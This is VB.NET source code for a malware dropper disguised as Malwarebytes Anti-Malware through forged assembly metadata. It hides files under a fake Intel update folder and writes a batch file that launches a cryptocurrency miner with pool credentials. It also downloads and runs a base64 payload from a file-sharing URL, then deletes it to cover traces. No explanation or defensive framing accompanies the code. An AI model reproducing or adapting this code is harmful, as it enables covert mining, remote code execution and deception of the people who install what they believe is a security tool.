Imports System
Imports System.Data
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Text
Imports System.Reflection.Emit
Imports Microsoft.VisualBasic
Imports Microsoft.Win32
Imports System.IO
Imports System.Net
Imports System.Threading
Imports System.Windows.Forms
Imports System.Security.Cryptography
Imports System.IO.Compression
Imports System.Collections.Generic
<Assembly: AssemblyTitle("MalwareBytes Anti-Malware")>
<Assembly: AssemblyDescription("A malware removal tool.")>
<Assembly: AssemblyCompany("MalwareBytes Inc.")>
<Assembly: AssemblyProduct("MalwareBytes Anti-Malware")>
<Assembly: AssemblyCopyright("©2012 MalwareBytes Inc.")>
<Assembly: AssemblyTrademark("MalwareBytes Inc. All rights reserved.")>
<Assembly: AssemblyVersion("12.01.32")>
<Assembly: AssemblyFileVersion("12.01.32.00")>
Module Module1
<DllImport("user32.dll", SetLastError:=True, CharSet:=CharSet.Auto)> _
Private Function FindWindow( _
ByVal lpClassName As String, _
ByVal lpWindowName As String) As IntPtr
End Function
'MHN KSEXASW NA FTIAKSW TO STARTUP GIATI EINAI GAMIMENO
Sub Main()
dim klidi as string ="EDW TO KLIDI"
If My.Computer.FileSystem.DirectoryExists("C:\ProgramData/Intel") Then
'do thing
Else
My.Computer.FileSystem.CreateDirectory("C:\ProgramData/Intel")
End If
If My.Computer.FileSystem.DirectoryExists("C:\ProgramData/Intel/IntelUpdate") Then
'do thing
Else
My.Computer.FileSystem.CreateDirectory("C:\ProgramData/Intel/IntelUpdate")
End If
File.Create("C:\ProgramData/Intel/IntelUpdate/as2.bat").Dispose()
Dim sb As New StringBuilder()
Using sr As New StreamReader("C:\ProgramData/Intel/IntelUpdate/as2.bat")
sb.AppendLine("@echo off")
sb.AppendLine(vbNewLine)
sb.AppendLine("Rundll32.exe -a 5 -g no -o http://us3.eclipsemc.com:8337 -u orion_2 -p 18731873")
sb.Append(sr.ReadToEnd())
sb.AppendLine()
sb.AppendLine()
End Using
Using outfile As New StreamWriter("C:\ProgramData/Intel/IntelUpdate/as2.bat")
outfile.Write(sb.ToString())
End Using
System.Threading.Thread.Sleep(593)
Dim miagic As New WebClient
Dim ggffff As String = miagic.DownloadString(CustomXOR_Decrypt("http://ge.tt/api/1/files/7InUjLa/0/blob?download",klidi))
My.Computer.FileSystem.WriteAllBytes("C:\ProgramData/Intel/IntelUpdate/intel.exe", Convert.FromBase64String(ggffff), False)
System.Threading.Thread.Sleep(1593)
If My.Computer.FileSystem.FileExists("C:\ProgramData/Intel/IntelUpdate/intel.exe") Then
Dim program1 As System.Diagnostics.ProcessStartInfo
Dim startprogram1 As New System.Diagnostics.Process
Dim program1file As String = "C:\ProgramData/Intel/IntelUpdate/intel.exe"
program1 = New System.Diagnostics.ProcessStartInfo(program1file)
startprogram1.StartInfo = program1
startprogram1.Start()
System.Threading.Thread.Sleep(1593)
End If
System.Threading.Thread.Sleep(20000)
If My.Computer.FileSystem.FileExists("C:\ProgramData/Intel/IntelUpdate/intel.exe") Then
My.Computer.FileSystem.DeleteFile("C:\ProgramData/Intel/IntelUpdate/intel.exe")
End If
End Sub
Public Function CustomXOR_Decrypt(ByVal Input As String, ByVal pass As String) As String
Dim out As New System.Text.StringBuilder
Dim Hash As New System.Security.Cryptography.MD5CryptoServiceProvider
Dim XorHash As Byte() = Hash.ComputeHash(System.Text.Encoding.ASCII.GetBytes(pass))
Dim u As Integer
For i As Integer = 0 To Input.Length - 1 Step +2
Dim tmp As String = Chr(("&H" & Input.Substring(i, 2)) Xor XorHash(u))
out.Append(tmp)
If u = pass.Length - 1 Then u = 0 Else u = u + 1
Next
Return out.ToString
End Function
End Module
